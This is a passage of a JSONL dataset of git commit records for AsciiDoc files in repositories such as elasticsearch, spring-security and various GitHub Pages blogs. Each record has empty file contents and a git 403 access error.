isterAndersen\/elasticsearch,andrejserafim\/elasticsearch,yanjunh\/elasticsearch,episerver\/elasticsearch,maddin2016\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,awislowski\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,bawse\/elasticsearch,JackyMai\/elasticsearch,episerver\/elasticsearch,LeoYao\/elasticsearch,kaneshin\/elasticsearch,rmuir\/elasticsearch,nazarewk\/elasticsearch,strapdata\/elassandra5-rc,girirajsharma\/elasticsearch,gingerwizard\/elasticsearch,socialrank\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,spiegela\/elasticsearch,yanjunh\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,markharwood\/elasticsearch,henakamaMSFT\/elasticsearch,trangvh\/elasticsearch,snikch\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,polyfractal\/elasticsearch,schonfeld\/elasticsearch,glefloch\/elasticsearch,scottsom\/elasticsearch,myelin\/elasticsearch,winstonewert\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,andrejserafim\/elasticsearch,nomoa\/elasticsearch,nezirus\/elasticsearch,i-am-Nathan\/elasticsearch,ivansun1010\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,StefanGor\/elasticsearch,dpursehouse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wbowling\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,myelin\/elasticsearch,i-am-Nathan\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,zkidkid\/elasticsearch,GlenRSmith\/elasticsearch,LewayneNaidoo\/elasticsearch,alexshadow007\/elasticsearch,schonfeld\/elasticsearch,fforbeck\/elasticsearch,palecur\/elasticsearch,vroyer\/elassandra,rhoml\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,rlugojr\/elasticsearch,liweinan0423\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,jchampion\/elasticsearch,uschindler\/elasticsearch,mmaracic\/elasticsearch,yynil\/elasticsearch,StefanGor\/elasticsearch,elasticdog\/elasticsearch,polyfractal\/elasticsearch,jprante\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ricardocerq\/elasticsearch,ESamir\/elasticsearch,njlawton\/elasticsearch,mmaracic\/elasticsearch,martinstuga\/elasticsearch,fred84\/elasticsearch,girirajsharma\/elasticsearch,F0lha\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,nomoa\/elasticsearch,martinstuga\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,PhaedrusTheGreek\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,Shepard1212\/elasticsearch,AndreKR\/elasticsearch,mapr\/elasticsearch,ivansun1010\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,girirajsharma\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70af2722cd52d0a2aac5b7f3d9e390aafc2c8241","subject":"Added test about file.","message":"Added test about file.","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"about\/about.adoc","new_file":"about\/about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"254094d10ee6f3fb9edd47b78c385d47d5c04d21","subject":"Update 2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","message":"Update 2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","new_file":"_posts\/2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70cdabdae8a55e03ca2cf567598c5d31ae161404","subject":"Update 2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","message":"Update 2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","new_file":"_posts\/2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68fc84ad3f2a8f236cfe45a4ed6e93c1172bce87","subject":"Update 2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","message":"Update 2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","new_file":"_posts\/2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5212f19fcd6ed54811cb7bde463db21ed794325","subject":"Publish 2016-6-26-first-title.adoc","message":"Publish 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c03ec77e0e046be10300c7fb6f69d5f6114be51","subject":"Update 2016-06-05-Testing-feign-clients.adoc","message":"Update 2016-06-05-Testing-feign-clients.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-06-05-Testing-feign-clients.adoc","new_file":"_posts\/2016-06-05-Testing-feign-clients.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eeabb094175187b3831bafa25a55cceec60a73bb","subject":"ReleaseNotesDummy Adding dummy release notes file to repo","message":"ReleaseNotesDummy Adding dummy release notes file to repo\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-4-8-release-notes.adoc","new_file":"virt\/virt-4-8-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0696d958c172ae7d054ae9c0798842f2effb4c4d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4faae2e5a2ecc5c4cdd27ad934b40d9a77935941","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7394b1573c04e0ba5c451c5f2162c179d205c36c","subject":"Update 2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09fb50224bfbecea539ddbdf960f6037255a4333","subject":"relnotes: Prepare for Kudu 1.6 release","message":"relnotes: Prepare for Kudu 1.6 release\n\nThis patch simply removes the release notes for Kudu 1.5.0 and puts in\nplaceholders for Kudu 1.6.0.\n\nChange-Id: I582abbf99deda2928db79c4c90ba638993f2151c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8632\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85a76ef9dd7d4142d7d9f36848f9dde644d333df","subject":"Update 2015-05-14-test.adoc","message":"Update 2015-05-14-test.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-test.adoc","new_file":"_posts\/2015-05-14-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b191479ed10dc51d05da96c0b30fabc88601733","subject":"draft deref for 06\/23","message":"draft deref for 06\/23\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/23\/deref.adoc","new_file":"content\/news\/2021\/07\/23\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"eba6ce692f470cbb0ebaf28103b3f1780ea1993c","subject":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","message":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4c00e2d6ab6249299d8690d72024ebff8a11719","subject":"Update 2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","message":"Update 2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","new_file":"_posts\/2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f36d495c812f053eb5637235e70672204da5c307","subject":"Initial docs describing lift's DI","message":"Initial docs describing lift's DI\n","repos":"lift\/framework,lift\/framework,lift\/framework,lift\/framework","old_file":"docs\/dependency-injection-liftweb-scala.adoc","new_file":"docs\/dependency-injection-liftweb-scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lift\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7360a803d49769da00328ec89b2f089bf907e43","subject":"SEC-3152: Add @Retention to @WithMock documentation","message":"SEC-3152: Add @Retention to @WithMock documentation\n","repos":"rwinch\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,eddumelendez\/spring-security,spring-projects\/spring-security,panchenko\/spring-security,panchenko\/spring-security,fhanik\/spring-security,mdeinum\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,ollie314\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,djechelon\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,thomasdarimont\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,panchenko\/spring-security,rwinch\/spring-security,djechelon\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,wkorando\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,panchenko\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,ollie314\/spring-security,rwinch\/spring-security,fhanik\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,wkorando\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,pwheel\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/test.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65823aec473db0f805c93d552ae42fb81a6c0464","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbded651b308fc67d0ee06db2d4f1b582561b915","subject":"Update 2015-08-23-Daisies-arent-roses.adoc","message":"Update 2015-08-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5135e3612bbd842f9df832c356372fa5633d5984","subject":"Publish 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_file":"2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2276e2a3393f64a365ece52df96ef3cc443621a1","subject":"job #9680 - CLI import implementation note","message":"job #9680 - CLI import implementation note\n","repos":"leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint","old_file":"doc-bridgepoint\/notes\/9680_cli_import\/9680_cli_import_int.adoc","new_file":"doc-bridgepoint\/notes\/9680_cli_import\/9680_cli_import_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fd0e5dbed125c4124d5eab93125774ded378441","subject":"Update 2016-08-19-2016-08-19.adoc","message":"Update 2016-08-19-2016-08-19.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-19-2016-08-19.adoc","new_file":"_posts\/2016-08-19-2016-08-19.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c7bb4588d83ac5f6b532d2a7799f075ad360c37","subject":"started work on #139","message":"started work on #139\n","repos":"kitenco\/aim42,feststelltaste\/aim42,rschimmack\/aim42,aim42\/aim42,aim42\/aim42,rschimmack\/aim42,feststelltaste\/aim42,kitenco\/aim42","old_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rschimmack\/aim42.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f2a25012b2db0d5f4d9e68478cb93cb2bbcfe5d8","subject":"Update 2017-01-28-Livros-de-Prolog.adoc","message":"Update 2017-01-28-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fddab1d547673559262745a5149a4df2f14855c1","subject":"y2b create post A Keyboard Made Of Wood?","message":"y2b create post A Keyboard Made Of Wood?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-23-A-Keyboard-Made-Of-Wood.adoc","new_file":"_posts\/2016-01-23-A-Keyboard-Made-Of-Wood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3643247a15cb2bda22c8242c0cf707b8ca8fdbd","subject":"Update 2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","message":"Update 2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","new_file":"_posts\/2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e94e6054354f59fd1bdca400bb8a2229aecbea","subject":"Revert \"Removing old documentation mentioning NodeBuilder.\"","message":"Revert \"Removing old documentation mentioning NodeBuilder.\"\n\nThis reverts commit 3ca02d647eafcd875802109fcbd009e80d37e5bb.\n","repos":"qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,avikurapati\/elasticsearch,camilojd\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,nomoa\/elasticsearch,ZTE-PaaS\/elasticsearch,avikurapati\/elasticsearch,yanjunh\/elasticsearch,lks21c\/elasticsearch,girirajsharma\/elasticsearch,ricardocerq\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,elasticdog\/elasticsearch,uschindler\/elasticsearch,nilabhsagar\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,ricardocerq\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra5-rc,mikemccand\/elasticsearch,myelin\/elasticsearch,trangvh\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,robin13\/elasticsearch,IanvsPoplicola\/elasticsearch,liweinan0423\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,zkidkid\/elasticsearch,mortonsykes\/elasticsearch,brandonkearby\/elasticsearch,elasticdog\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,IanvsPoplicola\/elasticsearch,awislowski\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,sreeramjayan\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,alexshadow007\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,fforbeck\/elasticsearch,Helen-Zhao\/elasticsearch,scorpionvicky\/elasticsearch,camilojd\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,nazarewk\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,myelin\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,nilabhsagar\/elasticsearch,fernandozhu\/elasticsearch,ZTE-PaaS\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,rlugojr\/elasticsearch,spiegela\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,sreeramjayan\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,glefloch\/elasticsearch,jprante\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,obourgain\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,palecur\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,camilojd\/elasticsearch,LewayneNaidoo\/elasticsearch,JackyMai\/elasticsearch,girirajsharma\/elasticsearch,mohit\/elasticsearch,palecur\/elasticsearch,dpursehouse\/elasticsearch,zkidkid\/elasticsearch,trangvh\/elasticsearch,Shepard1212\/elasticsearch,nomoa\/elasticsearch,nezirus\/elasticsearch,JervyShi\/elasticsearch,C-Bish\/elasticsearch,girirajsharma\/elasticsearch,gmarz\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,avikurapati\/elasticsearch,nezirus\/elasticsearch,obourgain\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,palecur\/elasticsearch,rlugojr\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,